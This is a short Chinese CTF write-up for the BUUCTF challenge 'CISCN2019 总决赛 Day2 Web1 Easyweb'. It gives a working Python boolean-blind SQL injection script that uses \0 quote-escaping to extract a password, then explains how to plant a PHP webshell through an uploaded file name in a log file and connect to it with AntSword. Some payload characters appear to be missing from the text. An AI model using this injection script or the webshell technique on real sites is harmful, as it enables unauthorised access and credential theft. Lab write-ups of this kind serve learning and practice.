buu-[CISCN2019 总决赛 Day2 Web1]Easyweb

扫！（或者靠经验先试）
/robots.txt

看源码发现已知的php只有user.php/image.php/index.php

然后在image.php.bak里找到源码

 
老布尔盲注了吗，刚好前两篇博客也是布尔盲注。id为0返回为空，id为1返回图片
 
可以考虑用转义单引号，把危险代码放在path变量中
 
最后结果要是，那么经过str_replace函数处理之前可以是\0（函数中的\0，第一个斜杠转义，表示成真实的）
 \0在经过addslashes函数处理之前可以是。
 那么就变成，我们在id处传入，即可在经过一系列处理后变成，转义单引号。
 语句即变成：
 select * from images where id=’’ or path=’{$path}’
 
 python也自带转义，所以通过id=\0输入id=
 
import  requests
url = "http://b4620cc8-aca8-4783-90f6-014cff3e7546.node4.buuoj.cn:81/image.php"
payload = "?id=\0&path= or ascii(substr((select password from users),{},1))>{}%23"
result = ''
for i in range(1,100):
    high = 127
    low = 32
    mid = (low+high) // 2
    while(high>low):
        res = requests.get(url + payload.format(i,mid))
        if res.content != b'':    
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(mid)
    print(result)
 
 
账号admin直接登录
 
 随便上传一张图片，会给你一个上传到的界面
 
 logs/upload.877d2f6e262751f24d5400c1e53ffb2b.log.php
 后面的. LOL不用管
 
 这里可以看到自己上传的文件名，应该是利用文件名写马
 bp上传
 
 利用短标签
 
 能看到成功上传了，经测试也能执行phpinfo();
 
 蚁剑连接就好了
 
 以上算是原题的非预期解，后面搜wp学习了获取账号密码和成为admin的预期解
 [CISCN2019 总决赛 Day2 Web1]Easyweb（预期解）